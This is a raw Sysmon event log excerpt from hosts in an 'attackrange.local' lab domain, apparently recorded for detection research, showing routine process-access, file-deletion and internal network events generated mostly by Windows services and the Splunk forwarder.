07:45:25.406{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806288Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.406{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806287Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.406{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806286Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.406{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806285Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.406{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806284Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.406{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806283Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.406{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806282Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.406{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806281Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.406{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F315-60EB-4479-00000000D001}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806280Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.406{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F315-60EB-4479-00000000D001}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806279Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.392{0C1E0330-F315-60EB-4479-00000000D001}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:25.190{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=3F35EF069FB77408A9EE78E38B102F35,SHA256=A5952A37F794CDFAA735B243FE5C1A70435E1DF43CECAB41B8885DA93779C7AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806278Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.219{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=11B2D9C207525A814897619BB31A818C,SHA256=3441B5C0D63EAC883D58D9D9216976FBE9123CB474B1F472F0CDB91D01885105,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806277Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.219{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=70816EC04134BACD210F87C78F0C3F93,SHA256=FEF34BDDBCE61CE239ACB94E890490879BC9DFFA8D76F4B994A6857AE0154EA6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806276Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:23.305{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57171-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001046429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:26.689{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B7B821F7B86B02A2294FFD052FBFDBC3,SHA256=832CCEF440B3984659C13C213530C7435390440388F20ABF8B3083FB75DCFD18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:26.689{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3D162B1B36F3E948E03DAC4626BB667C,SHA256=60404DCCE3D6AF264081902350106F86CCD4830CE6DBAA923B2B86BFE6A54A11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:26.638{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9404E821E214EE6C10B29873DC72C7D,SHA256=13DF40F45308E5303A75EE6932A8CA8C5BB02A7370903A5E66CF09E2CE14C16E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806322Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.922{0C1E0330-F316-60EB-4679-00000000D001}32402908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806321Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.781{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F316-60EB-4679-00000000D001}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806320Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806319Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806318Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806317Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806316Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806315Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806314Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806313Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806312Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806311Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.781{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F316-60EB-4679-00000000D001}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806310Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:26.781{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F316-60EB-4679-00000000D001}3240C:\Program 